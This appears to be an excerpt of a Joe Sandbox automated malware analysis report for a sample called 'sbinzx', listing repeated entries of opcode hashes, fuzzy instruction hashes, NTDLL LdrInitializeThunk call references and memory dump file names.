                                                                                • Snapshot File: hcaresult_9_2_400000_sbinzx.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B7FD4F,000000FF,00000024,01C16634,00000004,00000000,?,-00000018,7D810F61,?,?,01B38B12,?,?,?,?), ref: 01B62C24
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c443b96a61ebcd277e939922b4fa9f19de3f1554752cc999ac089cc0d2e1eaa7
                                                                                • Instruction ID: 447f75f190f9d992502d4d1cd10d1b2d54505c58050f1587ce1bce0dccc1ff86
                                                                                • Opcode Fuzzy Hash: c443b96a61ebcd277e939922b4fa9f19de3f1554752cc999ac089cc0d2e1eaa7
                                                                                • Instruction Fuzzy Hash: F3B09B729015C5C9EA15F764460C7177904B7D0701F15C0F1D2130646F473CC1D1E275
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B77BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 01B62BFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: afaa3f832cfcdcf458ecc0d9b4ee198d48e367647aee23b92d5acb4c005620ef
                                                                                • Instruction ID: 62ce311424b1060fb9f1cbf13987a7f150092abf7ddd26d38d29335fdf24c8fe
                                                                                • Opcode Fuzzy Hash: afaa3f832cfcdcf458ecc0d9b4ee198d48e367647aee23b92d5acb4c005620ef
                                                                                • Instruction Fuzzy Hash: 6690023220140802D1847158440864A000597D1301F95C065A0125659DCB158B5977A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B90DBD,?,?,?,?,01B84302), ref: 01B62B6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7a1985efd8b75a249aabfa9dff8e37bb9ca7181d5f1b2a8b1814ab0c57e94bd5
                                                                                • Instruction ID: 913a22760cf88ac9b4e34e30fe7c2c99942d5148d659138d460d75eae0a495a6
                                                                                • Opcode Fuzzy Hash: 7a1985efd8b75a249aabfa9dff8e37bb9ca7181d5f1b2a8b1814ab0c57e94bd5
                                                                                • Instruction Fuzzy Hash: 5990026220240003410971584418616400A97E0201B55C071E1114595DC62589916225
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B99864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,01B6034A,?,?,?,00000003), ref: 01B62ADA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 29207d86e1d31dc4001f80a1e6db99d0c4949582ffbd7123d58c2336a048778e
                                                                                • Instruction ID: 8e2d63fb7fe57ee5e9925142db7f580b7e127c86bd8f5ee0d4bee526bd072047
                                                                                • Opcode Fuzzy Hash: 29207d86e1d31dc4001f80a1e6db99d0c4949582ffbd7123d58c2336a048778e
                                                                                • Instruction Fuzzy Hash: 1390043731140003010DF55C070C5070047D7D5351355C071F1115555CD731CD715331
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B9E73E,0000005A,01BFD040,00000020,00000000,01BFD040,00000080,01B84A81,00000000,?,?,00000002,00000000,?,?,01B6AE00), ref: 01B62DFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5ddcb4450f756532387e7c38fbafe5efb5f22e89708e855373642978f834f2f1
                                                                                • Instruction ID: 12e507bb7c996f5fb786558ba13cb686624e9c8e475fe7a04e2832a58ceeb6a0
                                                                                • Opcode Fuzzy Hash: 5ddcb4450f756532387e7c38fbafe5efb5f22e89708e855373642978f834f2f1
                                                                                • Instruction Fuzzy Hash: CC90023220140413D11571584508707000997D0241F95C462A052455DDD7568A52A221
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B791A3,00000000,00000000,?,?,?,01B28A1A,01BFC2B0,00000018,01B18873), ref: 01B62DDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: f0311ac0520fd5c9ce56273fec23a162a7ce186dbd2dcd4843db055e3ca03d91
                                                                                • Instruction ID: c864d37fe71415bc6f69e99243d32fa97957dae2afd6d7459da407c3422009f5
                                                                                • Opcode Fuzzy Hash: f0311ac0520fd5c9ce56273fec23a162a7ce186dbd2dcd4843db055e3ca03d91
                                                                                • Instruction Fuzzy Hash: 34900222242441525549B15844085074006A7E0241795C062A1514955CC6269956D721
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B4A52A,000000FF,?,01C167F8,01BFC9A0,00000020,01B4A460,01C1689C,00000000,0000001D,?,015C2D00), ref: 01B62D3A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: aa3ec294acb0767e8f68a0eb47a0ad91bad50a5dec17c66bc081ec7715c5ff45
                                                                                • Instruction ID: 354066f62ee75b79868ae18b370a989323a5f1ca1aae3fd363d5a3fc2a20a1e8
                                                                                • Opcode Fuzzy Hash: aa3ec294acb0767e8f68a0eb47a0ad91bad50a5dec17c66bc081ec7715c5ff45
                                                                                • Instruction Fuzzy Hash: 1F90022230140003D1447158541C6064005E7E1301F55D061E0514559CDA1589565322
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01BAB508,00000004,000000FF,0000001E,00000000,00000000,00000000,C0000409,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 01B62D1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 1a62d5aaf5884f00a2d5c7529a2daa01da6859e1ebc8ba1ae99af8ae9a91e10f
                                                                                • Instruction ID: 68b633ebdaa63323897f3b3b4df1c37345e4fe0304f7933f1c9e462d273ebdf0
                                                                                • Opcode Fuzzy Hash: 1a62d5aaf5884f00a2d5c7529a2daa01da6859e1ebc8ba1ae99af8ae9a91e10f
                                                                                • Instruction Fuzzy Hash: 2690022A21340002D1847158540C60A000597D1202F95D465A011555DCCA1589695321
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B43999,000000FA,00000001,?,00000050,?,?), ref: 01B62CAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: cb33fdf975622a37d614bf49bdfeac907d362519ba0f843d72984bd93897b823
                                                                                • Instruction ID: b6d5e0935aa6b0b879032af103f02d0404bb116f2d852e3dd21cadc6e2dc22b0
                                                                                • Opcode Fuzzy Hash: cb33fdf975622a37d614bf49bdfeac907d362519ba0f843d72984bd93897b823
                                                                                • Instruction Fuzzy Hash: 0A90023220140402D1047598540C646000597E0301F55D061A512455AEC76589916231
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B7FD4F,000000FF,00000024,01C16634,00000004,00000000,?,-00000018,7D810F61,?,?,01B38B12,?,?,?,?), ref: 01B62C24
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: d469f601b70afc7bcafb1b685f17bdf3f92eae39cc8d376655f72bc31d89e640
                                                                                • Instruction ID: 775d921fab30efb97737d3bbfe5ce7d4e8f36e4f6ab9b926f8c6d0698ea7e874
                                                                                • Opcode Fuzzy Hash: d469f601b70afc7bcafb1b685f17bdf3f92eae39cc8d376655f72bc31d89e640
                                                                                • Instruction Fuzzy Hash: 3EA0023140260947C341BA24844942DE264BAD021134AC356D5064486A47241892BA61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B1FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01B77BE5,00001000,00004000,000000FF,?,00000000), ref: 01B62C7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5e751b1cf8d0a43b831e0b25ab3739f8c5a3eb278109c922d6cf0dd5965f28a6
                                                                                • Instruction ID: 95eccc02884f164c99d79a5de85fdac311fa91cc0b32ea88ed91001ecf07b54b
                                                                                • Opcode Fuzzy Hash: 5e751b1cf8d0a43b831e0b25ab3739f8c5a3eb278109c922d6cf0dd5965f28a6
                                                                                • Instruction Fuzzy Hash: 4D90023220148802D1147158840874A000597D0301F59C461A452465DDC79589917221
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B605E3,00000000,00000000,00000001,00000000,00000000,00000000,?,01B62380,01B603B6,00000000,00000000,?,00000000,?), ref: 01B62FBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c93f95e4e7a1660df128531baafe1f80077896ec690063c91671a363ac560b15
                                                                                • Instruction ID: dd3ba011fdec737ab8187d4425ac6bba7ed9c26fbb661af236ea0fb6dc17165e
                                                                                • Opcode Fuzzy Hash: c93f95e4e7a1660df128531baafe1f80077896ec690063c91671a363ac560b15
                                                                                • Instruction Fuzzy Hash: 5F900222601400424144716888489064005BBE1211755C171A0A98555DC65989655765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B9CF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 01B62F9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6828f264f85481b72b99971b80bfcbda77e267756f5d899861ae95d90fc16ab9
                                                                                • Instruction ID: adbfebfe4860516a2ed615fc91f87e5ed39eea70d3ad3ef9991be43570809ae4
                                                                                • Opcode Fuzzy Hash: 6828f264f85481b72b99971b80bfcbda77e267756f5d899861ae95d90fc16ab9
                                                                                • Instruction Fuzzy Hash: 0990023220180402D1047158481870B000597D0302F55C061A126455ADC72589516671
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B617E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 01B62FEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 08afdea935c45c3c5dae7fd82fea64662179472196869f06a6d13fc9b4781ab6
                                                                                • Instruction ID: 386e12ef81a4ee8a4a39b57d4853c989110d43fec3f7a2e103b6fdac17e9a324
                                                                                • Opcode Fuzzy Hash: 08afdea935c45c3c5dae7fd82fea64662179472196869f06a6d13fc9b4781ab6
                                                                                • Instruction Fuzzy Hash: 76900222211C0042D20475684C18B07000597D0303F55C165A0254559CCA1589615621
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01BAB4E6,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000000,00000000,00000000,00000058), ref: 01B62F3A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1376762515.0000000001B16000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001AF7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001B76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001BB2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C13000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1376762515.0000000001C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1af0000_sbinzx.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8b509971cab41024fa266799ad1923db515ae896f59b853fa2e2960765c9865e
                                                                                • Instruction ID: 1bd4b4fcfbcadba1c4aa7727700d4f8c07633b96f89580f8ddcacb2e29e1cb27
                                                                                • Opcode Fuzzy Hash: 8b509971cab41024fa266799ad1923db515ae896f59b853fa2e2960765c9865e
                                                                                • Instruction Fuzzy Hash: F990026234140442D10471584418B060005D7E1301F55C065E1164559DC719CD526226
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(01B81B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 01B62EAA
                                                                                Memory Dump Source
